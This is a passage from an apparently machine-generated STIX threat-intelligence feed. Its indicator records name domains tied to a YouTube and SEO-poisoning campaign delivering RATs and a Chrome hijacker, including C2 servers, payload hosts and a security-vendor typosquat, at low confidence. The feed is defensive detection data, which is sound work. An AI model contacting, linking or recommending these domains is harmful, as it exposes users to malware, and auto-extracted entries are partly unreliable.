centscarf[.]xyz","pattern":"[domain-name:value = 'cardgrape.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b2ca902d-7612-467c-b5cf-2fe38724efc1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cattlegold.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: abbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate an","pattern":"[domain-name:value = 'cattlegold.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2f913c40-4025-4a7c-b8da-9423eaf110d2","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: celeryerror.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate and landing infrastruc","pattern":"[domain-name:value = 'celeryerror.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f5db524c-b9ed-4ab9-8295-ecb17d7aa236","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: centscarf.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate and landing infrastructure Domain chalkp","pattern":"[domain-name:value = 'centscarf.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--219ebc83-46a2-4eb9-8889-e268c6fa3518","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: chalkprose.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rf[.]xyz CL-CRI-1171 gate and landing infrastructure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[","pattern":"[domain-name:value = 'chalkprose.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--35a2c428-a5bc-4f79-a75a-bb3fd8dfb085","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: chawton.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: tructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader payload handoff and second-stage hosts Domain","pattern":"[domain-name:value = 'chawton.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f5393394-0d9a-4c65-af59-3002a4ada66e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cherriestruck.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 1 gate and landing infrastructure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]x","pattern":"[domain-name:value = 'cherriestruck.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5bd7581d-7799-45d5-9d4a-365beca1b5d7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: chesstail.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: structure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]x","pattern":"[domain-name:value = 'chesstail.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b6e5468-94c2-4fba-a648-a66d98ea0194","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: chickensmine.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: halkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz","pattern":"[domain-name:value = 'chickensmine.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d6619f46-fd87-45fd-8e69-77665a177748","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: chinexpert.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: t.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]x","pattern":"[domain-name:value = 'chinexpert.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc8574cf-7e45-456f-a577-fb1b93cd3753","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: churchpail.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: iestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz","pattern":"[domain-name:value = 'churchpail.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bba06996-5a8c-4bc8-aab9-4ec7873eda9e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: clothcrib.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate a","pattern":"[domain-name:value = 'clothcrib.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--37f0a065-8d50-4373-9665-d184d060f121","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: clothcurrent.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate and landing infrastruc","pattern":"[domain-name:value = 'clothcurrent.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ed17b121-ff87-496a-810b-20bea4b3c563","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: coatberry.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate and landing infrastructure Domain connec","pattern":"[domain-name:value = 'coatberry.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--af4052d5-ec8b-4d7d-ad8a-964351a598dd","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: collartitle.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]o","pattern":"[domain-name:value = 'collartitle.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e7df4d5e-4e5e-44ed-8670-1dc05ee43f45","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: conditiongrade.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: onnect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]x","pattern":"[domain-name:value = 'conditiongrade.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0359bded-bbfb-4014-88cf-d6870b90d638","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: coppersummer.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: t.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz","pattern":"[domain-name:value = 'coppersummer.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--635a8b91-1076-4b2b-9193-912437258ae8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: creatorcreator.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; con","pattern":"[domain-name:value = 'creatorcreator.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d35c99cb-3282-4f21-9aff-cb8b3cefeeed","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: crowdstri.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: cript host Domain stryper[.]info ; aa.amazingshield[.]xyz ; crowdstri[.]com Insomnia RAT stage hosts and Python-agent C2 typosquat Do","pattern":"[domain-name:value = 'crowdstri.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7ed719e4-25a4-46a8-8763-bab52aa214f1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: drelto.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 6546.py Stage-three Python Insomnia RAT agent URL hxxps[:]//drelto[.]info/farlix Search-result injection script host Domain stryper","pattern":"[domain-name:value = 'drelto.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--510a6abd-87c2-41f3-a902-885d8e409280","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: dresstent.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz","pattern":"[domain-name:value = 'dresstent.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--522293b9-5991-4897-9b7f-30961937fe34","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: dropjeans.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]x","pattern":"[domain-name:value = 'dropjeans.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b8a618d7-3cad-4261-8ba1-6e342c124887","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: edgeplayground.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]xyz CL-CRI-1171 installation-tra","pattern":"[domain-name:value = 'edgeplayground.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--adc24518-f29d-4529-9444-017b298ee6df","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: exchangeclub.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]xyz CL-CRI-1171 installation-tracker infrastructure Domain co","pattern":"[domain-name:value = 'exchangeclub.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9da4822c-c947-4eed-a149-a5b61f329927","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: existencediscussion.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: CRI-1171 installation-tracker infrastructure Domain connect.existencediscussion[.]info ; connect.expansionsalt[.]info ; connect.fangstitch[.]xyz","pattern":"[domain-name:value = 'existencediscussion.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f72456de-4ab3-406d-b52e-f3a1486ae60f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: expansionsalt.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ructure Domain connect.existencediscussion[.]info ; connect.expansionsalt[.]info ; connect.fangstitch[.]xyz ; connect.fogparcel[.]info ; c","pattern":"[domain-name:value = 'expansionsalt.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f2d2e9d9-f3dc-4c4d-9c71-7a9582f0f7fb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: extentrack.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro Hijacker rule delivery, telemetry,","pattern":"[domain-name:value = 'extentrack.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--330871a4-1f34-45ad-9b79-7ac06aa6eeba","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: filescloud.pro","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: xspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]c","pattern":"[domain-name:value = 'filescloud.pro']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--67c5cfc6-832b-4fac-8537-79f9b8b9ba71","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: filexspace.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: helake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud","pattern":"[domain-name:value = 'filexspace.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cd46bc44-ca66-4e07-98e1-290c55bebc63","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: filexstorage.site","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: sfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ;","pattern":"[domain-name:value = 'filexstorage.site']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--05599d77-3447-40ae-94ae-a5e1f041c1fd","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: finersto.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro","pattern":"[domain-name:value = 'finersto.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f58e49e7-59b8-4c5a-89d6-0e315a15e83b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: fuelleg.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: lview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]in","pattern":"[domain-name:value = 'fuelleg.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1a42d8e3-359f-4dd7-a368-1483b8f750e9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ggclicker.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: es[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-access SEO-poisoning and fak","pattern":"[domain-name:value = 'ggclicker.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c27ffb75-29f8-4a33-8bb5-b35872eca214","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: mifilesx.site","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watcha","pattern":"[domain-name:value = 'mifilesx.site']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--09f63552-14a4-4d83-984c-3cf5c4d60e7a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: minewave.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: traw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]x","pattern":"[domain-name:value = 'minewave.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1483d897-c8ca-46af-96c8-924fb20a294d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: mqsearch.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro Hijacker rule de","pattern":"[domain-name:value = 'mqsearch.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 